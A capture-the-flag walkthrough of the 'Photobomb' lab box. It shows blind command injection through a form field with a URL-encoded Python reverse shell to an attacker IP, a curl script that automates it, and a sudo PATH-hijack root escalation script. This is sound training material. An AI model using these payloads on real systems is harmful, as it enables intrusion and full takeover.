# Photobomb

## Enumeration

`sudo nmap -sV <IP>`

* nginx 1.18 serves a web application on port 80; SSH is open on port 22
* The page source contains interesting hints:

```
<p>To get started, please <a href="/printer" class="creds">click here!</a> (the credentials are in your welcome pack).</p>
<p>If you have any problems with your printer, please call our Technical Support team on 4 4283 77468377.</p>
```

I continued with some dir fuzzing:

```
fuzzing:
	/printer
	/printers
	/printerfriendly
	/printer_friendly
	/printer-friendly
	/printer_icon
	/printer-icon
	/printerFriendly
-> All show the same page
```

When requesting a non-existent page, there is an interesting error:

<figure><img src="https://746814813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fe1HXVppEt3OHWIFqtAXT%2Fuploads%2Fq37Xg6u4K3GI0oYsOBOp%2Fimage.png?alt=media&#x26;token=cf63689e-816f-4f5e-a2cc-cdd1af41cf3c" alt=""><figcaption></figcaption></figure>

There is a JS file that contains the URL <http://pH0t0:b0Mb!@photobomb.htb/printer>, i.e. the basic-auth credentials `pH0t0:b0Mb!` for the `/printer` page embedded in the userinfo part of the URL.

The `/printer` page lets you download image files. If you intercept the download request with Burp and test different injections, the response changes when a `;` followed by a command is appended to a parameter value. So there might be a blind OS command injection.

## Blind OS Command Injection

If you inject into the `filetype` parameter with the payload `jpg;ping+-c+4+10.10.16.4`, you can confirm with tcpdump on the attacking host (e.g. `sudo tcpdump -i tun0 icmp`, assuming tun0 is the VPN interface) that the command has been executed: four ICMP echo requests arrive from the target.

Trying different reverse shell payloads, none of them worked at first. Only a specific Python reverse shell worked, and only after URL-encoding the `=` and `&` characters (and the `;` between the chained commands) and replacing spaces with `+`, so that the injected command is not split up by the form parser.

This was the payload that worked in the end (the URL-encoded form body of the download request, with the injection in `filetype`):

```
photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg;export+RHOST%3d"10.10.16.4"%3bexport+RPORT%3d4444%3bpython3+-c+'import+sys,socket,os,pty%3bs%3dsocket.socket()%3bs.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))%3b[os.dup2(s.fileno(),fd)+for+fd+in+(0,1,2)]%3bpty.spawn("sh")'&dimensions=3000x2000
```
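To avoid hand-encoding the body in Burp every time, here is an added example script (my own, not part of the original writeup) that percent-encodes the injected command the same way the payload above does, assembles the form body and sends it with curl. It assumes the download form is POSTed to `http://photobomb.htb/printer` with the basic-auth credentials found earlier; the listener host and port are passed as arguments.

```shell
#!/usr/bin/env bash
# Added example (not from the original writeup): build the URL-encoded form body
# for the filetype injection and send it with curl.
# Assumptions (not stated on the page): the download form is POSTed to
# http://photobomb.htb/printer and the basic-auth credentials pH0t0:b0Mb! apply.

# Percent-encode a string like a browser encodes a form field
# (application/x-www-form-urlencoded): unreserved characters pass through,
# space becomes '+', everything else becomes %XX. This is what stops the
# '=' and '&' inside the injected command from being read as field separators.
urlencode() {
  local s="$1" out="" c i
  for ((i = 0; i < ${#s}; i++)); do
    c="${s:i:1}"
    case "$c" in
      [A-Za-z0-9._~-]) out+="$c" ;;
      ' ')             out+='+' ;;
      *)               out+=$(printf '%%%02X' "'$c") ;;
    esac
  done
  printf '%s' "$out"
}

# Assemble the body: photo and dimensions stay as in a normal request, the
# filetype field carries "jpg;" followed by the encoded shell command.
build_body() {
  local photo="$1" cmd="$2" dims="${3:-3000x2000}"
  printf 'photo=%s&filetype=jpg;%s&dimensions=%s' \
    "$(urlencode "$photo")" "$(urlencode "$cmd")" "$dims"
}

# The reverse shell from the writeup, with the listener address substituted.
revshell_cmd() {
  local lhost="$1" lport="$2"
  printf 'export RHOST="%s";export RPORT=%s;' "$lhost" "$lport"
  printf '%s' "python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"sh\")'"
}

# Send the request. Needs a listener first, e.g. nc -lvnp 4444.
fire() {
  local lhost="$1" lport="${2:-4444}" body
  body=$(build_body "voicu-apostol-MWER49YaD-M-unsplash.jpg" "$(revshell_cmd "$lhost" "$lport")")
  curl -s -u 'pH0t0:b0Mb!' -X POST 'http://photobomb.htb/printer' \
       -H 'Content-Type: application/x-www-form-urlencoded' --data "$body"
}

# Usage: ./inject.sh 10.10.16.4 4444   (only fires when arguments are given)
if [ "$#" -ge 1 ]; then
  fire "$@"
fi
```

Note that the `;` directly after `jpg` is left unencoded on purpose, exactly as in the working payload, while the `;` characters inside the command are encoded to `%3B` (the writeup's `%3b`, same thing).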

## Sudo SETENV Script

`sudo -l` reveals that the user `wizard` may run `/opt/cleanup.sh` as root via sudo, and that the rule carries the `SETENV` tag.

<figure><img src="https://746814813-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fe1HXVppEt3OHWIFqtAXT%2Fuploads%2F71B1uOvDeafsqQqQixnq%2Fimage.png?alt=media&#x26;token=89dba5a0-14dc-407b-a012-0460a1ab9a4e" alt=""><figcaption></figcaption></figure>

The `SETENV` tag lets the caller pass environment variable assignments such as `PATH=...` on the sudo command line, which is what makes overriding the script's PATH possible even though sudo normally resets it. Since the script calls `find` by its bare name instead of an absolute path, the shell resolves it through PATH. So create an executable file named `find` in the home directory of the user `wizard` that runs `/bin/bash`, and then execute the script with a PATH that lists that directory first:

```
sudo PATH=/home/wizard:/bin /opt/cleanup.sh
```

Because `/opt/cleanup.sh` runs as root, the fake `find` it spawns gives a root shell.
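As an added example (my own, not from the original writeup), the following script stages the fake `find` and shows which binary a PATH lookup picks once the attacker's directory is in front. The cleanup script itself is not reproduced; all that matters is that it calls `find` without an absolute path. The staging directory is a parameter so the resolution check can run anywhere; on the box it would be `/home/wizard`.

```shell
#!/usr/bin/env bash
# Added example (not from the original writeup): PATH hijack of a bare `find`
# call in a script that sudo runs as root with the SETENV tag.

# Write an executable "find" that just drops into bash. When root runs
# /opt/cleanup.sh with PATH pointing here first, this is what "find" executes.
stage_fake_find() {
  local dir="$1"
  printf '#!/bin/bash\n/bin/bash\n' > "$dir/find"
  chmod 755 "$dir/find"
  printf '%s/find\n' "$dir"
}

# Resolve "find" the way the script's shell would, with the attacker's
# directory prepended to PATH. Prints the path of the binary that would run.
# Done in a subshell so the caller's PATH is untouched.
resolve_find() {
  local dir="$1"
  ( PATH="$dir:/bin"; command -v find )
}

# The actual escalation (not executed here): the same PATH, passed through
# sudo. SETENV in the sudoers rule is what allows the caller to set PATH.
escalate() {
  local dir="$1"
  sudo PATH="$dir:/bin" /opt/cleanup.sh
}

# Demo: stage in a temporary directory and show which "find" wins.
demo_dir=$(mktemp -d)
stage_fake_find "$demo_dir" >/dev/null
echo "PATH lookup now resolves find to: $(resolve_find "$demo_dir")"
# On the target, as wizard:  stage_fake_find /home/wizard && escalate /home/wizard
```

A quick check before running it on the target: `resolve_find` must print the staged file and not `/usr/bin/find`; if it does not, the file is not executable or the directory is not first in PATH.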

